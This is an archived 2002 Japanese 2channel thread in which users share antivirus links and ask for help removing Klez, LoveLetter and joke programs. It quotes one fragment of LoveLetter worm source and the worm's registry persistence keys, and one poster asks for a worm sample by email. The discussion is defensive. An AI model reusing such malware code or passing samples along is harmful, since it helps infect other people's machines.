5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆ウィルス情報&質問 総合スレッド☆part5

1 : :02/07/23 13:13
ウィルスに関わる話題・質問はこちらに

IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報 http://www.nai.com/japan/virusinfo/vinfo.asp
オンラインウイルス検索http://housecall.antivirus.com/housecall/start_jp.asp

[関連リンク]過去ログ・関連スレ等>>1-20あたり 補足>>1-50

・ウィルス用ソフトを入れて無い人は(知識や技術のある人を除いて)速やかに入れましょう
(無料AntiVirus【AntiVirPE/AVG/Antidote簡易版】http://pc.2ch.net/test/read.cgi/sec/1015584020/l50)

(win)[Ctrrl]+{F}キー (mac){コマンド}+{F}キーを押すとページ内検索が出来ます
このスレや過去スレの過去ログを検索してから質問してください

2 :名無しさん@お腹いっぱい。:02/07/23 13:14
過去スレ
このウイルス何? http://pc.2ch.net/test/read.cgi/sec/999636595/l50
☆ウィルス情報&質問 総合スレッド☆ http://pc.2ch.net/test/read.cgi/sec/1010948022/
☆ウィルス情報&質問 総合スレッド☆part2 http://pc.2ch.net/test/read.cgi/sec/1016863569/l50

Symantec Security Check
http://security2.norton.com/SSC/GetBrowser.asp?pkj=TICCYSHSFVIGMKIIPLB&scantype=2&plfid=20&langid=jp&venid=sym&from=/ssc/lunavbrk.asp
オンラインウイルス検索http://housecall.antivirus.com/housecall/start_jp.asp

検索窓にファイル名等を入力して利用。
基本中の基本だけど、ワクチンベンダーごとに、ウイルスの命名は違う。

Symantecウイルス辞典日本語版
http://www.symantec.com/region/jp/sarcj/vinfodb.html
Symantecウイルス辞典英語版(日本語版と微妙に内容が異なる事がある)
http://www.symantec.com/avcenter/vinfodb.html

TrendMicroウイルス情報
http://www.trendmicro.co.jp/vinfo/

McAFEEウイルス情報
http://vil.mcafee.com/default.asp?

[ウィルス対策ソフト]
【ノートン】インターネットセキュリティ2002 Ver.8 http://pc.2ch.net/test/read.cgi/sec/1019831285/l50
ウイルスバスター2002 Part3 http://pc.2ch.net/test/read.cgi/sec/1016076378/l50
がんばれマカフィー http://pc.2ch.net/test/read.cgi/sec/1020474494/l50
がんばれ!!ウイルス警備隊V3 http://pc.2ch.net/test/read.cgi/sec/1005442785/l50

[ウィルス対策ソフト(無料)]
無料AntiVirus【AntiVirPE/AVG/Antidote簡易版】http://pc.2ch.net/test/read.cgi/sec/1015584020/l50
H+BEDV Antivir Personal Edition Part2 http://pc.2ch.net/test/read.cgi/sec/1016561367/l50
【フリー】AVG Anti-Virus Version2 http://pc.2ch.net/test/read.cgi/sec/1018966825/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50

最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50

3 : :02/07/23 13:14
「森で遊ぼう」
(ファイヤーウォールソフト・無料ウィルス用ソフト等セキュリティ関係解説サイト
ダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.tripod.co.jp/


・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)は危ないと感じた人達へ
ネスケ(ネットスケープコミュニケータ)を使用するという手段があることも念頭にいれておいてください
http://home.netscape.com/ja/

4 : :02/07/23 13:15
新種のウィルスが流行したときは専用スレのリンクよろしくお願いします

「Nimda !! 」【その4】 http://pc.2ch.net/test/read.cgi/sec/1001864573/l50
猛威をふるう BADTRANS.B Re: メール (4通目)http://pc.2ch.net/test/read.cgi/sec/1008355163/l50
HDぜんぶ消去した上ズタズタに!!ウィルス http://pc.2ch.net/test/read.cgi/sec/1001662997/l50
Flashムービーに感染するウィルスが登場! http://pc.2ch.net/test/read.cgi/sec/1010564675/l50
'code red'wormに続きw32/sircam http://pc.2ch.net/test/read.cgi/sec/995726416/l50
W32.Aliz.Wormって何? http://pc.2ch.net/test/read.cgi/sec/1006266327/l50
またIEにセキュリティホール! http://pc.2ch.net/test/read.cgi/sec/1008610094/l50
開いただけでウイルスに感染するページhttp://pc.2ch.net/test/read.cgi/sec/994847789/l50
WORM_GONE.A http://pc.2ch.net/test/read.cgi/sec/1007514716/l50
Mac用ウイルス対策ソフト http://pc.2ch.net/test/read.cgi/sec/1007675941/l50
virus下さい。http://pc.2ch.net/test/read.cgi/sec/996909531/l50
みんなでウイルスつくろうよ!!http://pc.2ch.net/test/read.cgi/sec/1008248305/l50 
[初心者必見]分かりやすいnimda対策ページhttp://pc.2ch.net/test/read.cgi/sec/1001407163/l50
ウィルスくれよ。サーカムとか。http://pc.2ch.net/test/read.cgi/sec/996425178/l50
コードレッドパート5 日本政府は反省汁http://pc.2ch.net/test/read.cgi/sec/997783469/l50
KDMEMPKD.EXEってなに? http://pc.2ch.net/test/read.cgi/sec/1011333304/l50
怪奇画像(怖い女)が一定感覚で現れる症状 http://pc.2ch.net/test/read.cgi/hack/1011083919/l50
気持ち悪い女の顔がhttp://pc.2ch.net/test/read.cgi/sec/1012037926/l50
今日最新のウイルスって・・・!!(Myparty) http://pc.2ch.net/test/read.cgi/sec/1012220835/l50
HDぜんぶ消去した上ズタズタに!!ウィルス 2台目http://pc.2ch.net/test/read.cgi/sec/1012296560/l50
破損、トロイ、ウィルス入り 4 http://tmp.2ch.net/test/read.cgi/download/1016806114/l50
【ネット】『C』で記述した初のウイルスが登場http://news.2ch.net/test/read.cgi/newsplus/1015048480/l50
ダイヤルQ2か国際電話に接続を切り替えるやつhttp://pc.2ch.net/test/read.cgi/isp/1010717649/
<IT>CからZドライブを全て上書きするFinal Fantasyワームhttp://news.2ch.net/test/read.cgi/newsplus/1015938003/l50

5 :名無しさん@お腹いっぱい。:02/07/23 13:15
【ウィルス警報】patch.exeに注意しる!http://pc.2ch.net/test/read.cgi/sec/1016082075/l50
<IT>ご注意!チェック済み装うウイルス「マイライフB」http://news.2ch.net/test/read.cgi/newsplus/1016802914/l50
ADSLユーザーにも 国際電話発信トラブルhttp://pc.2ch.net/test/read.cgi/sec/1016106504/l50
【勝手にDLし勝手に実行!ひとりエッチ上手なIE6】http://pc.2ch.net/test/read.cgi/sec/1016485189/l50
IE5・5と6・0、ネット閲覧ソフトに欠陥http://pc.2ch.net/test/read.cgi/sec/1005605775/l50
PE_Mtx.A, WORM_MTX.A に犯されました。http://pc.2ch.net/test/read.cgi/sec/1015939831/l50
開いただけでウイルスに感染するページhttp://pc.2ch.net/test/read.cgi/sec/994847789/l50
Klez系,Klez.Eスレッドhttp://pc.2ch.net/test/read.cgi/sec/1018248786/l50
インターネット悲しい目をした犬http://pc.2ch.net/test/read.cgi/sec/1018186700/l50
【勇気が無くてみれない画像スレッド】http://ex.2ch.net/test/read.cgi/entrance/1018680687/l50
♂MCAFEEのウィルススキャン どうよ♂http://pc.2ch.net/test/read.cgi/software/1001838214/l50

6 : :02/07/23 13:16
part4
http://pc.2ch.net/test/read.cgi/sec/1024061532/

7 :名無しさん@お腹いっぱい。:02/07/23 13:19
part3 
http://pc.2ch.net/test/read.cgi/sec/1020696417/

8 :けっこう低レベルで申し訳無い:02/07/23 13:31
ノートンインターネットセキュリティーを買ってきた。
で、セキュリティーをどのくらいにセットしとけば
まあ安全でHPとめーるを観覧できるだろうか?
僕は初心者でパソコンはHP作ってネットショップ
やってます。
どっかに教えてくれるスレある?

9 :リンク更新:02/07/23 13:38
新種のウィルスが流行したときは専用スレのリンクよろしくお願いします

「Nimda !! 」【その4】 http://pc.2ch.net/test/read.cgi/sec/1001864573/l50
猛威をふるう BADTRANS.B Re: メール (4通目)http://pc.2ch.net/test/read.cgi/sec/1008355163/l50
HDぜんぶ消去した上ズタズタに!!ウィルス http://pc.2ch.net/sec/kako/1001/10016/1001662997.html
Flashムービーに感染するウィルスが登場! http://pc.2ch.net/test/read.cgi/sec/1010564675/
'code red'wormに続きw32/sircam http://pc.2ch.net/test/read.cgi/sec/995726416/l50
W32.Aliz.Wormって何? http://pc.2ch.net/test/read.cgi/sec/1006266327/l50
またIEにセキュリティホール! http://pc.2ch.net/test/read.cgi/sec/1008610094/l50
開いただけでウイルスに感染するページhttp://pc.2ch.net/test/read.cgi/sec/994847789/l50
WORM_GONE.A http://pc.2ch.net/test/read.cgi/sec/1007514716/
Mac用ウイルス対策ソフト http://pc.2ch.net/test/read.cgi/sec/1007675941/l50
virus下さい。http://pc.2ch.net/test/read.cgi/sec/996909531/l50
みんなでウイルスつくろうよ!!http://pc.2ch.net/test/read.cgi/sec/1008248305/l50 
[初心者必見]分かりやすいnimda対策ページhttp://pc.2ch.net/test/read.cgi/sec/1001407163/l50
ウィルスくれよ。サーカムとか。http://pc.2ch.net/test/read.cgi/sec/996425178/l50
コードレッドパート5 日本政府は反省汁http://pc.2ch.net/test/read.cgi/sec/997783469/l50
KDMEMPKD.EXEってなに? http://pc.2ch.net/sec/kako/1011/10113/1011333304.html
怪奇画像(怖い女)が一定感覚で現れる症状 http://pc.2ch.net/test/read.cgi/hack/1011083919/l50
気持ち悪い女の顔がhttp://pc.2ch.net/test/read.cgi/sec/1012037926/l50
今日最新のウイルスって・・・!!(Myparty) http://pc.2ch.net/test/read.cgi/sec/1012220835/l50
HDぜんぶ消去した上ズタズタに!!ウィルス 2台目http://pc.2ch.net/test/read.cgi/sec/1012296560/
破損、トロイ、ウィルス入り 4 http://tmp.2ch.net/download/kako/1016/10168/1016806114.html
【ネット】『C』で記述した初のウイルスが登場 http://news.2ch.net/newsplus/kako/1015/10150/1015048480.html
ダイヤルQ2か国際電話に接続を切り替えるやつ
<IT>CからZドライブを全て上書きするFinal Fantasyワームhttp://news.2ch.net/newsplus/kako/1015/10159/1015938003.html

10 :名無しさん@お腹いっぱい。:02/07/23 13:38
【ウィルス警報】patch.exeに注意しる!http://pc.2ch.net/test/read.cgi/sec/1016082075/l50
<IT>ご注意!チェック済み装うウイルス「マイライフB」http://news.2ch.net/newsplus/kako/1016/10168/1016802914.html
ADSLユーザーにも 国際電話発信トラブルhttp://pc.2ch.net/test/read.cgi/sec/1016106504/l50
【勝手にDLし勝手に実行!ひとりエッチ上手なIE6】http://pc.2ch.net/test/read.cgi/sec/1016485189/l50
IE5・5と6・0、ネット閲覧ソフトに欠陥http://pc.2ch.net/test/read.cgi/sec/1005605775/l50
PE_Mtx.A, WORM_MTX.A に犯されました。http://pc.2ch.net/test/read.cgi/sec/1015939831/l50
開いただけでウイルスに感染するページhttp://pc.2ch.net/test/read.cgi/sec/994847789/l50
Klez系,Klez.Eスレッドhttp://pc.2ch.net/sec/kako/1018/10182/1018248786.html
インターネット悲しい目をした犬http://pc.2ch.net/sec/kako/1018/10181/1018186700.html
【勇気が無くてみれない画像スレッド】http://ex.2ch.net/entrance/kako/1018/10186/1018680687.html
♂MCAFEEのウィルススキャン どうよ♂http://pc.2ch.net/software/kako/1001/10018/1001838214.html
【流行の】Frethem【ヨカーン】http://pc.2ch.net/test/read.cgi/sec/1026734507/l50
Klez.E、Klez系スレッド part3 http://pc.2ch.net/test/read.cgi/sec/1024255721/l50
●HDD全消去ウイルス3● http://pc.2ch.net/test/read.cgi/sec/1024943662/l50

11 :名無しさん@お腹いっぱい。:02/07/23 13:45
[ウィルス対策ソフト]
【ノートン】インターネットセキュリティ2002 Ver.10 http://pc.2ch.net/test/read.cgi/sec/1026543973/l50
ウイルスバスター2002 Part4 http://pc.2ch.net/test/read.cgi/sec/1021091165/l50
がんばれマカフィー http://pc.2ch.net/test/read.cgi/sec/1020474494/l50
がんばれ!!ウイルス警備隊V3 http://pc.2ch.net/test/read.cgi/sec/1005442785/l50

[ウィルス対策ソフト(無料)]
無料AntiVirus【AntiVirPE/AVG/Antidote簡易版】http://pc.2ch.net/test/read.cgi/sec/1015584020/
H+BEDV Antivir Personal Edition Part2 http://pc.2ch.net/test/read.cgi/sec/1016561367/l50
【フリー】AVG Anti-Virus Version2 http://pc.2ch.net/test/read.cgi/sec/1018966825/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50

最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50

12 :名無しさん@お腹いっぱい。:02/07/23 14:04
>>1

・ウィルス用ソフトを入れて無い人は(知識や技術のある人を除いて)速やかに入れましょう

無料ウィルス用ソフトAVP/AVG/Ad簡(その2
http://pc.2ch.net/test/read.cgi/sec/1027400238/l50

13 :cheshire-cat ◆CATJR.v6 :02/07/23 19:11
お願いなんですが。
最新のvilliはどのワクチンベンダーでも、(大体)みんな復元ポイント関連の注意は書かれているんですが。
古いvilli関連のページだと、書かれていないケースも多く存在しますんで。
念のため、見つけたら誘導願いまする。

Windows Me/XP の「_restore」フォルダから何度もウイルスを発見してしまう
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=2186

14 :名無しさん@お腹いっぱい。:02/07/24 11:09
>>8 とりあえずデフォルト・推奨と書かれてる設定で使う。ノートンは知識なくても
一定レベルのセキュリティが確保できるのが利点。

15 :保存:02/07/24 13:37
恐怖のHDD破壊ウイルス:いたづらしてごめんね
http://pc.2ch.net/test/read.cgi/sec/1018874433/l50

16 :KlezH:02/07/28 00:43
添付ファイル
file.html border.exe・・・・・KlezH file.txt index.8
Message-IDがない。
http://www.yukaido.ne.jp/ 愉快堂出版 http://whois.nic.ad.jp/cgi-bin/whois_gw?key=210.230.82.0
http://www.google.com/search?q=hirata@naoe.hiroshima-u.ac.jp&ie=UTF-8&oe=UTF-8&hl=ja&lr=

Received: from smtp.yukaido.ne.jp (210.230.82.4)
by ** with SMTP; **
Received: (qmail 78965 invoked from network); **
Received: from p29493c.kngwnt01.ap.so-net.ne.jp (218.41.73.60)
by smtp.yukaido.ne.jp with SMTP; **
From:hirata< hirata@naoe.hiroshima-u.ac.jp >
To: HQ2037_20020718_2013_thriftytales_com@ccom.net hostmaster@ccom.net
200207232018_g6NKIKm52450_KlezH@smtp01.asahi-it.com
200207251653_g6PGrCm18659_KlezH@smtp01.asahi-it.com
p29493c_kngwnt01_ap_so-net_ne_jp_KlezH@yukaido.ne.jp
218_41_73_60_KlezH@yukaido.ne.jp
Subject: Fw:HQ2037_20020718_2013_thriftytales_com,eager to see you

17 :名無しさん@お腹いっぱい。:02/07/28 06:50
すみません、質問なんですがこの症状のウイルスを教えてください
パソコンを起動してまもなく、DOSの窓が開き
「cドライブをフォーマットします」
と出て、「いいえ」を実行すると
「この処理はキャンセルできません」
とでて再起動をはじめました
ちなみにまだ再起動はしていません
ドライブをDに変更して中を見たところデータはまだ残っており
ウイルスバスター(体験版)を実行したのですが検知できませんでした
名称がわからないと対処ができないので
よろしくお願いします

18 : :02/07/28 08:10
>>17
ウイルスじゃなくってイタズラプログラムなんじゃないの?
ちょっと前に2ちゃんのあちこちに貼られていた
いわゆる「マンキン・ウイルス」、これがその類。
アンチウイルス・ベンダーによってはトロイ扱いにして
処理対象にしたりしなかったり、さらにはニュース記事に
ウイルス扱いしたものまで登場して、いろいろ議論があったが。
こんなのとか
http://pc.2ch.net/test/read.cgi/sec/1024943662/

19 :名無しさん@お腹いっぱい。:02/07/28 08:32
>>18
やはりイタズラプログラムっぽいですか
とりあえずそれらについて調べてみます
情報ありがとうございました

20 :名無しさん@お腹いっぱい。:02/07/28 09:23
以前このスレだったかどうかわからないのですが、「SU0.MPG」「SU1.MPG」
というファイルがドライブCにしらない間にできてしまい、消去しても
またできてしまう、というのと同じ症状になり、再セットアップしたのですが、
また同じ症状がでてしました。再セットアップ後にネットをしている際に
「GAIN」というところの「Date Manager」というソフトがしらない間にインストール
されてしまったりもしました。ファイウォールやスキャンなどしてはいるのですが。
どうかご教授お願いします。またスレ違いだったらどのスレにいけばいいか教えて
いただけたら幸いです。お願い致します。


21 :cheshire-cat ◆CATJR.v6 :02/07/28 09:33
>>20
こちらかと。
http://pc.2ch.net/test/read.cgi/sec/1027059662/

22 :20:02/07/28 09:37
>>21
ありがとうございました。相談に逝ってきます。

23 :17:02/07/28 10:03
17です
イタズラプログラムについていろいろと調べてみたのですが、
該当するものが見つからず、行き詰まってしまいました
上記の条件に該当するイタズラプログラム、ウイルスは
ほかにどのようなものがあるのかできれば教えてもらえませんか?

24 :名無しさん@お腹いっぱい。:02/07/28 11:34
>>23
とりあえず、今残ってるデータは全てバックアップしとけ。
で、再インストールを奨める。

何か変なもの実行したりしなかった?

25 :17:02/07/28 11:48
>>24
はい、とりあえず最低限のものはバックアップ中です
でも再インストール前に何に感染したのか知りたいので
なんとか情報をお願いします

変なものは特に実行してないと思います

26 :(゚∀゚):02/07/29 03:13
>>25
ぶっちゃけた話、MXやってる?あるいは割れ物アプリ使ってるとか。
アンチウィルスソフトの定義ファイルが古すぎるとか。

そこんとこどうよ?

27 :17:02/07/29 05:35
そこんとこは結構心当たりがあったりします
アンチウィルスソフトはとりあえずバスタの体験版の最新を使ったので古すぎるということはないと思います

28 :名無しさん@お腹いっぱい。:02/07/29 07:41
>>27
体験版じゃダメダメ

29 :17:02/07/29 08:22
やはり製品版を買わなければだめですかね?
一応バスタのオンラインチェックもしてみたんですがそれも引っかかりませんでした

30 :名無しさん@お腹いっぱい。:02/07/29 09:02
>>29
オンラインチェックで解決するなら製品版は売れない。

31 :(゚∀゚):02/07/29 14:28
>>27
アンチウィルスソフトは定義ファイルを常に最新版に更新しないと
意味がない。しかもここ数日間かなり頻繁にアップデートしてるのでなおさら。

場合によっては自分だけでなく、知らないうちに他人にも迷惑を
かける可能性もあるので、素直にバスターもしくはノートンを買っとけ。



32 :名無しさん@お腹いっぱい。:02/07/29 14:46
http://www.yomiuri.co.jp/00/20020729i105.htm
ドールだって

33 :名無しさん@お腹いっぱい。:02/07/29 16:02
>>32
の ドールください

34 :33:02/07/29 16:31
anntahikatteruyo@hotmail.com

35 :名無しさん@お腹いっぱい。:02/07/29 18:02
これ、Whiterとは違うのか?

36 :cheshire-cat ◆CATJR.v6 :02/07/29 19:23
実物が手に入らなかった。

37 :名無しさん@お腹いっぱい:02/07/30 19:32
2ch見たら反応するウィルスの情報ってどこだっけ?

38 :名無しさん@お腹いっぱい。:02/07/30 19:41
>>37 ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

39 :名無しさん@お腹いっぱい:02/07/30 22:05
>38
ありがとっ!

40 :onnbody:02/08/01 05:52
お尋ねしたいのですが、どーやらウィルスにやられたようで
まともに起動しなくなりました。
ファイルが壊れて
頭が”run is dos mode”と書き換えられてしまったようです。
いろんな開き方を試みましたが、開けませんでした。
メールやワードファイルなどを復旧したいのですが可能でしょうか?

41 :名無しさん@お腹いっぱい。:02/08/01 06:20

W32.Duni.Wormに感染しました。心配なのでリカバリーします。



42 :名無しさん@お腹いっぱい。:02/08/01 06:49
>>40
なんのウィルスに感染したのかわからなければ、
すでにメールデータも感染している可能性があるので、
操作すること自体おすすめしない。あきらめるほかない。

それにそもそも DOS の基本コマンドとかわかる?わかっていた
としても、あなたの HDD のディレクトリ構造などこっちはわからんから
2ch のような掲示板で、操作を遠隔操作するのはまず不可能。

>>41
???上書き再インストール???クリーンインストール???

43 :onnbody:02/08/01 12:25
>>42
ディレクトリ作成と移動とファイルのコピーデリートくらいならなんとか。
もし可能なら、データ復旧会社みたいなところに頼んででも復旧させたいくらいなんですよ。


44 :FIFA公認最新ランキング:02/08/01 14:50
1.Norton AntiVirus 2002
2.ウイルスバスター 2002
3.AntiVir Personal Edition
4.AVG 6.0 Free Edition
5.Avast Home Edition
6.Antidote 簡易版
7.ウイルスバスター Online
8.Panda ActiveScan
9.ウイルス警備隊
10.McACafee VirusScan Online
11.Symantec Securty Check

※オンラインスキャンはウイルススキャンの性能が良くても実用性の面で順位が下がっています

45 :名無しさん@お腹いっぱい。:02/08/01 15:44
>>44
国際サッカー連盟?

46 :名無しさん@お腹いっぱい。:02/08/01 16:36
MSNのメッセがウイルスにかかったようなのです。
登録してある友人のアドレスにウイルスメールが後を絶たないそうで…
アンインストールしてもダメなのです。
ウイルスについては初心者同然なので全くどうしていいかわかりません。
どうしたらいいのでしょうか?

47 :名無しさん@お腹いっぱい。:02/08/01 16:41
ノートンのメル鯖、今おかしくない?

48 :名無しさん@お腹いっぱい。:02/08/01 18:56
>>43
本当にウィルスにやられているんなら、データ復旧会社に
頼んだほうがよろし。

ただ、vxd ファイルなどがぶっ壊れているだけなら、
安い HDD 買ってくれば、その知識で十分復旧可能だと
思うんだけど?

49 :onnbody:02/08/01 20:41
>>48
>ただ、vxd ファイルなどがぶっ壊れているだけなら、

それはどういう風に復旧すればよいのですか?簡単でいいので説明してください。



50 : :02/08/02 00:14
[SceneCritique] irc.scenecritique.com:8888 OP041
詳しくはhttp://opennap.scenecritique.com/参照。
ウザい鯖管もチャット部屋も無し要するに素人にはお勧めでき
ない共有0者検索不能の玄人向け空間。けど制限低めで地球に優しい
諸刃の剣。密談はIRC(irc.scenecritique.com:6667、IP不可視IRC)
で。http://s1p.net/sc/ (IRC)ね。ヘルプはIRCの#scにて、#winnyも
あり□。WWWからの#scダイレクト参加は
http://chat.scenecritique.com/qi-login.cgi?ch=%23sc

51 :名無しさん@お腹いっぱい。:02/08/02 01:31
ニュース速報版を見ていたらLOVE-LETTERに感染したよ・・・



52 :容赦なく貼る男:02/08/02 02:13
これか
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs 2
http://news.2ch.net/test/read.cgi/news/1028112477/

53 :名無しさん@お腹いっぱい。:02/08/02 02:24
>>51
感染ヂャナクテ「検出」です。ンデモ漏れ的には「誤」はつきませんとおもうます。
ナ、ナ、ナンドイッタラワカルノデスカァ〜〜〜!!

54 :助けて:02/08/02 02:28
某所で、EXEファイル落として実行したら、
なんか変な女の画像が画面いっぱいに出てきました。
ヤバイかな・・・・・・と思い、急いで電源を切り、
再起動すると、最初は何も起きないのですが、
少し経つと、また変な女の画像が画面いっぱいに・・・・・・
かなり不気味です。
気の弱い自分にとって、かなり嫌な存在です。
これはウィルスなのでしょうか?
一応、スキャンして、怪しいファイルなども消してみましたが、
なんか怖くて、再起動したくありません。
どうにかなりませんか?誰か自分を助けてください。


55 :名無しさん@お腹いっぱい。:02/08/02 02:49
>>54
OSは?
msconfig で削除かな

56 :助けて:02/08/02 03:01
>>55
osはwinMEです
msconfigってなんですか?
初心者ですいません(汗

57 :名無しさん@お腹いっぱい。:02/08/02 03:10
スタートアップにある怪しいショートカットを削除
スタートメニューのファイル名をして実行>msconfig>怪しい奴のチェックをはずす
わからんかったら全部はずして、再起動をかけながら一つずつチェックを入れて探す
つーかウイルスじゃねーだろ・・・

58 :助けて:02/08/02 03:11
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A&VSect=T
たぶんこれだと思うのですが・・・
ここに書いてある文章がいまいちわかりません。
だれかわかりやすく教えてくれませんか?
おねがいします。

59 :名無しさん@お腹いっぱい。:02/08/02 03:13
・手動削除手順:
 プログラムの自動起動設定を削除します:Windowsのシステムエディタ(SYSEDIT.EXE)などを使用して"WIN.INI"の記述を修正してください:

 修正例:
・"WIN.INI"の"Run="の項目を修正
 修正前:"Run = ozawa.exe"
  ↓
 修正後:"Run ="

で、これのどこがわからんのか書け。

60 :助けて:02/08/02 03:16
>>59
win.iniのRun = ozawa.exeの
ozawa.exeを消せばいいのですか(汗
わかりました。
ありがとうございます。

61 :名無しさん@お腹いっぱい。:02/08/02 18:28
age

62 :名無しさん@お腹いっぱい。:02/08/02 19:01
worm.win32.datomってのに感染したみたいなんですが
msvxd.exeってのは削除してしまって大丈夫なんでしょうか

63 :質問です:02/08/02 19:27
WORM_KLEZでは、

http://www.trendmicro.co.jp/klez/whats.asp

にあるように、WQK.EXE 「PE_ELKERN.B」で検知します。
  ・Windows NT/2000/XP:WQK.DLL で検知します。

と説明されていますが、
私のWINDOWS\SYSTEMには、
WQK.exe、および、WQK.DLL
というファイルではなくて、ディテクトリ(フォルダ)が形成されており、
中には何のファイルもありません。

感染しているのかと思って、レジストリを調べてみましたが、
上記サイトにある、

\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

から削除すべき、
値:Krn132 = <Windowsのシステムディレクトリ>\Krn132.exe
  値:WinSvc = <Windowsのシステムディレクトリ>\WinSvc.exe(WORM_KLEZ.Cの場合)
  値:Wink??? = <Windowsのシステムディレクトリ>\WINK???.exe(WORM_KLEZ.Eの場合、「???」はランダムな文字列であり不定です)
  値:wqk = <Windowsのシステムディレクトリ>\wqk.exe

が見当たりません。
これって、私のマシンは感染しているのでしょうか?
フォルダ更新時期が今年の5月になっていますが、妙なメールが沢山届くようになって
今日になって調べて初めて判明しました。

詳しい方ご教授お願いします。


64 :名無しさん@お腹いっぱい。:02/08/02 19:43
ウイルスウイルスって・・・馬鹿かおまえら。

65 :名無しさん@お腹いっぱい。:02/08/02 22:16

(-_-)ウツダ >>64

(´-`).。oO( スレタイ見る限りそれで当たり前
(´-`).。oO( 何がおかしいのか。

66 : :02/08/02 22:23
>>63
Klezスレとマルチ。

67 :  :02/08/02 22:29
http://orbita.starmedia.com/~lautaroml/virus.html

 ↑コレ何?

68 :名無しさん@お腹いっぱい。:02/08/03 13:41
長文で失礼します

Symantec Security Check
http://security2.norton.com/ssc/home.asp?langid=us&venid=sym&plfid=20&pkj=PNDUDTKJBTVISBYWWYP
上のURLに飛んで、ウィルスチェックをしたところ。

----------------------------------------------------------------------------------
Results of Virus Detection Scan
104098 files scanned, 4 file(s) infected.

Search for the name of the virus(s) listed below on the Symantec Security Response site for removal information.

A scan has not been run. To start Scan for Viruses, click here.

c:\WINDOWS\デスクトップ\かちゅーしゃ\log\money.2ch.net\stock\1015030446.dat is infected with VBS.LoveLetter.Var
c:\WINDOWS\デスクトップ\かちゅーしゃ\log\pc.2ch.net\sec\1000753945.dat is infected with VBS.LoveLetter.A
c:\WINDOWS\デスクトップ\かちゅーしゃ\log\pc.2ch.net\tech\993358225.dat is infected with JS.Exception.Exploit
c:\WINDOWS\デスクトップ\かちゅーしゃ\log\pc.2ch.net\tech\1026140108.dat is infected with VBS.LoveLetter.A
----------------------------------------------------------------------------------

このような結果が出て、4つのファイルがウィルスに感染している事がわかりました。
LoveLetterで検索したところ、やはり前にテレビでもよく流されていたウィルスだと確定。
このウィルスはOutlookに登録されているメールアドレスに自分を送信するらしいのですが
幸いOutlookをPCにインストールしていないので大丈夫だったようで安心したのですが
ここで、疑問がわいていきたのですが
このウィルスって題が「ILOVEYOU」という非常にわかりやすい題でとどくのですよね。
今まで、「ILOVEYOU」という題でメールが届いたことはないのです。
メーラーはEudora lightを使用し、添付されて送られてくるメールがいくつかあったのです
が、いっさい開いていません。添付ファイルを開いて実行しなければ感染はしないのですよね。
それともEudoraだと添付ファイル付きのメールを受信しただけで感染してしまっていたので
しょうか。

69 :68:02/08/03 14:05
とりあえず、ウィルスを削除しようと思い、ウィルス百科事典のサイトに飛んだのですが

---------------------------------------------------------
このウイルスが発動すると、Loveletterウイルスは以下の場所に自分自身のコピーを落し込みます。

WINDOWS\SYSTEM\MSKERNEL32.VBS
WINDOWS\WIN32DLL.VBS
WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS

また以下のレジストリキーを追加し、システム起動時に自分自身を起動させようとします。

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\Run\MSKernel32=WINDOWS\SYSTEM\MSKernel32.vbs

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\RunServices\Win32DLL=WINDOWS\Win32DLL.vbs
----------------------------------------------------
とのことで、vbsファイルを検索しましたが見つからず
レジストリも見てみましたがレジストリキーは追加されていません
でした。

これは、ウィルスはまだ発動していないと解釈していいのでしょうか。
検出された4つの感染ファイルをゴミ箱に捨てるだけでいいのでは
と思っているのですが、これでいいのでしょうか。
どなたかアドバイスください。


70 :名無しさん@お腹いっぱい。:02/08/03 14:08
>>68=69
長文ご苦労さまです。とりあえず、こちらでも。
http://pc.2ch.net/test/read.cgi/sec/1025872269/l50

71 :68:02/08/03 14:12
>>70
どうもご親切にありがとうございます。

必死で、いろんなサイトを巡って調べてました。
でも、まあいろいろ勉強になったのでよしとします。
これをきっかけに、セキュリティの勉強でもしようかと思います
ありがとうございました。

72 :名無しさん@お腹いっぱい。:02/08/03 14:14

>>68 どうでもいいけど
 
おいお前

”c:\WINDOWS\デスクトップ\かちゅーしゃ\log\”

何処にログフォルダ作ってるんだ
せめてProgram Filesに作れよ

それとも俺の勘違いか

73 :68:02/08/03 14:18
>>72
勘違いではないです。そこに置いてますけど
なにか問題でもあるのでしょうか?
ひょっとして、ダウンしたアプリ類はProgram Filesに入れておいた
方がいいのですか?

74 :なんでんきゃんでん:02/08/03 14:20
自分のパソコンがハッキングされているか調べる方法はありますか?
また、それは他人からわかる事なのでしょうか?
それとオンラインスキャンで何も発見されなかった場合、安心しても大丈夫でしょうか?
教えてください。

75 :名無しさん@お腹いっぱい。:02/08/03 14:27
>>74
<それは他人からわかる事なのでしょうか?

??? 他人って誰の事よ?

76 :名無しさん@お腹いっぱい。:02/08/03 14:27
>>73
まあ何処に置くも貴方のかってですが、
logも貯まると500Mbぐらいにまですぐになるからね
Program Filesに入れてショートカットをデスクトップに作るほうがいいと思う。

77 :なんでんきゃんでん:02/08/03 14:30
他人って言うのは例えばここの板の人とか。

78 :心得は何回も読め。   :02/08/03 14:32
>>74
まず貴方のパソコンをハックする値打ちがあるか考えろ

>それとオンラインスキャンで何も発見されなかった場合、安心しても大丈夫でしょうか?
>教えてください。

何も発見されなかったのなら、大丈夫。

79 :なんでんきゃんでん:02/08/03 14:34
ありがとうございます

